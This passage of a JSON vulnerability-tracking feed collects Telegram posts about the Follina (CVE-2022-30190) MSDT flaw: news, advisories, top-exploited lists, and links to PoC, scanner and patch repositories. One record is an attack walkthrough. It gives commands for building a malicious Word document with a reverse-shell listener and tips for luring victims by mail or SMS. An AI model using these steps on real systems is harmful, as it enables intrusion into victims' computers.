\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u043d\u0438\u0436\u0435.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0432\u0438\u0434\u0435\u043e\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC\n\n#redteam #rce #cve #windows", "creation_timestamp": "2022-06-02T14:10:28.000000Z"}, {"uuid": "0d38acc5-2458-4402-913a-ae0fa170f7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/643", "content": "https://www.hackbyte.org/microsoft-office-cve-2022-30190-vulnerability-follina-exploitation/", "creation_timestamp": "2022-06-03T08:12:32.000000Z"}, {"uuid": "53433230-d877-4499-8d44-80e2b73adc2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/reverse_dungeon/2035", "content": "#cve #MSDT\n\n[ CVE-2022-30190 ]\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190?fbclid=IwAR0UczaWjJNKWTnlvZHCXsWhABuae0kDRKx3hj-wo0LS1y8TZ32HR5w9t3w", "creation_timestamp": "2022-06-03T13:07:43.000000Z"}, {"uuid": "5460980a-2de9-4c2f-886c-cf8df6dfad2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/crackcodes/1915", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n\n2. CVE-2021-44228: Apache Log4Shell\n\n3. CVE-2022-22965: Spring4Shell\n\n4. CVE-2022-1388: F5 BIG-IP\n\n5. 
CVE-2022-0609: Google Chrome zero-day\nhttps://blog.google/threat-analysis-group/countering-threats-north-korea\n6. CVE-2017-11882: Old but not forgotten - MS Office bug\n\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n\n\n9. CVE-2022-26134: Atlassian Confluence RCE flaw  \n\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2022-12-21T16:27:48.000000Z"}, {"uuid": "c00590bf-d0b0-4bc9-8930-4547b9574389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/professional_c_h/1745", "content": "\ud83d\udca0 Follina - Microsoft MSDTC Vulnerability\n\n \ud83d\udc49\ud83c\udffb Follina is a remote code execution vulnerability where MSDT is invoked using the URL protocol from a calling application such as Word.  An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application.  The attacker can then install programs, view, modify or delete data, or create new accounts in the context allowed by the user's rights.\n\n \ud83d\udc41 An attacker can access a user's privileges using any application or even a shell.  An attacker can install programs, view, modify, delete data, or create new accounts with user privileges.  Follina's CVE number is CVE-2022-30190.\n\n\n Exploring Follina\n\n git clone https://github.com/JohnHammond/msdt-follina\n cd msdt-follina\n python3 follina.py -i X.X.X.X\n\n \ud83d\udcac In the above command, X.X.X.X is our IP address.  This will create a malicious doc file that launches a listener for its HTML payload on port 8000. You can view the documents in the msdt-follina directory.\n\n \ud83d\udcda We need to send it to our target's Windows system.  This is where you can apply your SI to hook your target.  
You can send it by mail or send a juicy SMS with a link to download a malicious DOC file.  We hosted it in our decentralized cloud storage.  (In order to use it externally, we need to use our external IP address and forward the required port).\n\n \ud83d\udc41\u200d\ud83d\udde8 Whenever our victim opens it and clicks \"Enable Editing\" in MS Word (for an older version of MS Office, this is not required, we can get them directly), we get a reverse connection to our Kali Linux, as in the screenshot  .\n\n \ud83d\udcbb But it can do much more if we create the payload with the following command, then we can even get a shell:\n\n python3 follina.py -r 7777\n\n \u2328\ufe0f In the above command we are using port 7777 to connect to the payload, here we can use any unused port.\n\n \ud83d\udc68\ud83c\udffb\u200d\ud83d\udcbb The above command will create a Netcat payload and start the listener, and it will also create a DOC file in the msdt-follina directory.  After our target clicked \"Enable Editing\", we got a shell on reconnect.\n\n \ud83d\udccc Now we can do everything that a user of the victim computer can do.  This vulnerability is unlikely to be fixed, at least in the past week.  
Our article is inspired by our friend NetworkChuck's video on YouTube, we can watch his next video (we made small changes to avoid mistakes).", "creation_timestamp": "2022-09-19T18:29:16.000000Z"}, {"uuid": "32900791-2ae7-40f9-8ec9-bfdc90bf4eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/HgWi9PhIzpFYcgYzXSCS4wMGhIJqav4sX4ysQ_39jTE3yw", "content": "", "creation_timestamp": "2022-12-08T15:32:35.000000Z"}, {"uuid": "9c7c4907-08df-46f0-b575-b82a2271f380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cibsecurity/43626", "content": "\u203c CVE-2022-30190 \u203c\n\nMicrosoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-02T00:24:57.000000Z"}, {"uuid": "bd322e21-7c68-47bc-a354-1d1028961fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47592", "content": "Chinese Threat Actors Exploiting 'Follina' Vulnerability\nhttps://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability\n\nThe Windows zero-day vulnerability identified as Follina and CVE-2022-30190 is being exploited in an increasing number of attacks, including by a Chinese APT group.\nread more (https://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability)", "creation_timestamp": "2022-06-01T12:55:45.000000Z"}, {"uuid": "e6051d57-6e6a-4230-aabe-31ee90585bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/theninjaway1337/1120", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190.\nThe security issue can be triggered by either\u00a0opening or selecting a specially crafted document\u00a0and threat actors have been exploiting it in attacks since at least\u00a0April 2022.\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-16T05:24:42.000000Z"}, {"uuid": "7a0492ac-091c-478e-bfe4-065bfd9bb499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47630", "content": "Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT\nhttps://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "6e1c8fe6-6d8c-44e5-a5e7-ded22c0838f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47631", "content": "A Zero-day Remote Code Execution Vulnerability with high severity has been identified as CVE-2022-30190 \u201cFOLLINA\u201d in Microsoft Windows...\nThe post Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT 
(https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/) appeared first on Quick Heal Blog | Latest computer security news, tips, and advice (https://blogs.quickheal.com/).", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "fd672d46-a1da-4ef4-9a01-d1d7c78f81c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47699", "content": "'Follina' Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware\nhttps://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware\n\nSeveral malware families are being delivered using the recently disclosed Windows vulnerability identified as Follina and CVE-2022-30190, which remains without an official patch.\nread more (https://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware)", "creation_timestamp": "2022-06-09T16:13:49.000000Z"}, {"uuid": "b5145431-b081-4df4-bf75-51125c02432b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47738", "content": "Windows Updates Patch Actively Exploited 'Follina' Vulnerability\nhttps://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability\n\nMicrosoft has fixed roughly 50 vulnerabilities with its June 2022 Patch Tuesday updates, including the actively exploited flaw known as Follina and CVE-2022-30190.\nread more (https://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability)", "creation_timestamp": "2022-06-14T23:24:43.000000Z"}, {"uuid": "eccd4c12-eff8-458a-864b-47b015fba7d6", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2127", "content": "#CVE-2022\n\nMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\n\nhttps://github.com/derco0n/mitigate-folina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:38:43.000000Z"}, {"uuid": "775c3ff8-355e-4ab9-8d4d-585b5fe13b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/thehackernews/3605", "content": "Cybercriminals are leveraging exploits for CVE-2021-40444 and CVE-2022-30190 to execute code through malicious Word files. Once opened, LokiBot malware is downloaded, logging keystrokes, capturing screenshots, and stealing data.  \n \nRead: https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "creation_timestamp": "2023-07-17T11:34:30.000000Z"}, {"uuid": "a06dfbd2-4288-4e01-ae7c-1fdc86eb325b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2567", "content": "#CVE-2022\nProof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.\nhttps://github.com/zhuowei/WDBFontOverwrite\n\nThis repo contains payload for the CVE-2022-36067\nhttps://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067\n\nProof of concept for CVE-2022-30190 (Follina).\n\nhttps://github.com/winstxnhdw/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2023-01-21T16:19:17.000000Z"}, {"uuid": "c035a73c-211f-4455-b1ee-a4e2ff04b7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 
"https://t.me/BlueRedTeam/2128", "content": "#CVE-2022\n\nThe CVE-2022-30190-follina Workarounds Patch\n\nhttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:41:22.000000Z"}, {"uuid": "aa42b911-131b-4908-9694-ad61329cf132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2129", "content": "#CVE-2022\n\nCVE-2022-30190 | MS-MSDT Follina One Click\n\nhttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-04T00:11:27.000000Z"}, {"uuid": "24bb56c6-e1fc-4ae3-874c-419c77acd708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2144", "content": "#CVE-2022\n\nExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\n\nhttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n@BlueRedTeam", "creation_timestamp": "2022-06-10T08:50:50.000000Z"}, {"uuid": "65319266-d74a-4a19-9e18-fa6b17634f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2169", "content": "#CVE-2022\n\nThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n@BlueRedTeam", "creation_timestamp": "2022-06-17T21:11:01.000000Z"}, {"uuid": "af48f052-65d4-47a6-b5ce-c64441c4aba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": 
"published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2170", "content": "#CVE-2022\n\nThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n@BlueRedTeam", "creation_timestamp": "2022-06-23T22:53:37.000000Z"}, {"uuid": "ace34b7d-b44a-4437-be39-59d1eceed6de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/575", "content": "https://github.com/aminetitrofine/CVE-2022-30190\n#github", "creation_timestamp": "2023-05-17T06:06:06.000000Z"}, {"uuid": "e18d2113-dc5b-4cd3-ac68-555ff0333d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2122", "content": "#CVE-2022\n\nCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\n\nhttps://github.com/rayorole/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T10:46:04.000000Z"}, {"uuid": "1f2c5904-d3ec-4c16-b438-19aff43fdafc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2126", "content": "#CVE-2022\n\nA tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T22:38:31.000000Z"}, {"uuid": "5b1a1056-2d58-4527-8cc9-de06f707c49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", 
"type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2460", "content": "#CVE-2022\n\n[+] Implementation of CVE-2022-30190 in C\n\nhttps://github.com/mattjmillner/CVE-Smackdown\n\n\n\n\n[+] Exploit POC for CVE-2022-42055 for GL-iNet routers using firmware below 3.215\n\nhttps://github.com/gigaryte/cve-2022-42055\n\n\n@BlueRedTeam", "creation_timestamp": "2022-11-16T00:09:22.000000Z"}, {"uuid": "a0c89c4f-0c19-4979-a6ee-d26a8a5a5bb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/haccking/8039", "content": "\u0422\u0440\u043e\u044f\u043d Qbot \u0443\u0436\u0435 \u0432\u0437\u044f\u043b \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0432\u0435\u0436\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Windows MSDT\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u043c\u0430\u043b\u0432\u0430\u0440\u044c Qbot \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Windows MSDT, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u043e\u0441\u0438\u0442 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Follina.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u044e, \u0447\u0442\u043e \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 Follina\u00a0\u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u00a0\u0432 \u043a\u043e\u043d\u0446\u0435 \u043c\u0430\u044f, \u0445\u043e\u0442\u044f 
\u043f\u0435\u0440\u0432\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2022 \u0433\u043e\u0434\u0430, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u0440\u0438\u0437\u043d\u0430\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c\u00a0CVE-2022-30190, \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word \u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432 \u00ab\u041f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a\u0435\u00bb, \u043f\u0440\u0438\u0431\u0435\u0433\u0430\u044f \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u0447\u0435\u0440\u0435\u0437 Microsoft Diagnostic Tool (MSDT).\n\nLife hack\ud83d\udc48", "creation_timestamp": "2022-06-10T15:36:44.000000Z"}, {"uuid": 
"e404c09f-662d-4a94-94e5-749023113599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/haccking/8128", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.doc -CVE-2022-30190", "creation_timestamp": "2022-06-26T17:45:36.000000Z"}, {"uuid": "16a27f7f-73cc-47e6-93d6-a765be7e45a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/DWuFghBm9DmmJST6bI9NuBgV03ST9Bw0n5hEo3vRPn0EqYFb", "content": "", "creation_timestamp": "2022-06-26T02:15:48.000000Z"}, {"uuid": "28181135-aef1-464a-9aa0-65ca6075b57b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/arvin_club/5491", "content": "https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T20:49:44.000000Z"}, {"uuid": "87dfe89e-f093-4691-8b96-26eb71786619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dragonforceio/739", "content": "P0c Patch / Fix 0day CVE-2022-30190 follina\n\nBy : impossible1337\nhttps://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/ \nForum Rasmi: https://dragonforce.io\nRadio Rasmi: 
https://radio.dragonforce.io\nFacebook: https://fb.me/dragonforcedotio\nTelegram: https://t.me/dragonforceio\nTwitter: https://twitter.com/dragonforceio\nYoutube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw", "creation_timestamp": "2022-06-03T03:00:12.000000Z"}, {"uuid": "258f83bb-1699-47d7-9506-6e6484a52698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/dragonforceio/740", "content": "https://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/", "creation_timestamp": "2022-06-03T03:01:35.000000Z"}, {"uuid": "2ecfd10c-7629-494e-9271-8b2bb2e9dac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/DCCFDjEFPe2QLNEHc05lpgLck17TBTfpWb2O-MdC7HDPV7nK", "content": "", "creation_timestamp": "2024-02-07T16:12:29.000000Z"}, {"uuid": "ac38b779-fea3-4e0b-be04-830a68121412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/mvPWI4un1-iOOZzGwGGDI0e0CA6ey2wKq3zB3-h9s87VgtZ8", "content": "", "creation_timestamp": "2024-02-07T16:16:30.000000Z"}, {"uuid": "4fe8b63e-8222-4521-b938-62e223ebde79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/7jzKcU8HVGZTkZZWwuUB25CufDvypfib6CwwM-UlhM1Jf1Mq", "content": "", "creation_timestamp": "2024-02-07T16:16:55.000000Z"}, {"uuid": "04e7299b-b9d8-4bfa-b1a4-4541328fcd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": 
"exploited", "source": "https://t.me/CyberSecurityTechnologies/6105", "content": "#Threat_Research\nNew Microsoft Office Attack Vector via \"ms-msdt\" Protocol Scheme (CVE-2022-30190)\nhttps://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694\n]-> https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug\n]-> https://github.com/bytecaps/CVE-2022-30190", "creation_timestamp": "2022-06-01T02:13:30.000000Z"}, {"uuid": "4299621d-9db9-4d4b-9bda-24b584db7c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/6326", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (June 1-30)\n\nCVE-2022-30190 - Follina exploit\nCVE-2022-26134 - OGNL injection in Atlassian Confluence Server/Data Center\nCVE-2022-26809 - Weakness in a core Windows 7/10/Srv19/22 component (RPC)\nCVE-2022-30075 - TP-Link AX50 Auth RCE\nCVE-2022-23222 - Linux Kernel eBPF LPE\nCVE-2022-32275 - Grafana 8.4.3 allows reading files\nCVE-2022-26937 - Windows NFS NLM Portmap Stack Buffer Overflow\nCVE-2022-23088 - Heap Overflow in FreeBSD Wi-Fi Stack\nCVE-2022-31626 - RCE in PHP <=7.4.29\nCVE-2022-30333 - Dir Traversal in rar", "creation_timestamp": "2024-10-12T06:49:41.000000Z"}, {"uuid": "43a4ea76-9dba-494a-ab7c-1ead3595d236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/7395", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n2. CVE-2021-44228: Apache Log4Shell\n3. CVE-2022-22965: Spring4Shell\n4. CVE-2022-1388: F5 BIG-IP\n5. CVE-2022-0609: Google Chrome 0-day\n6. CVE-2017-11882: MS Office RCE\n7. 
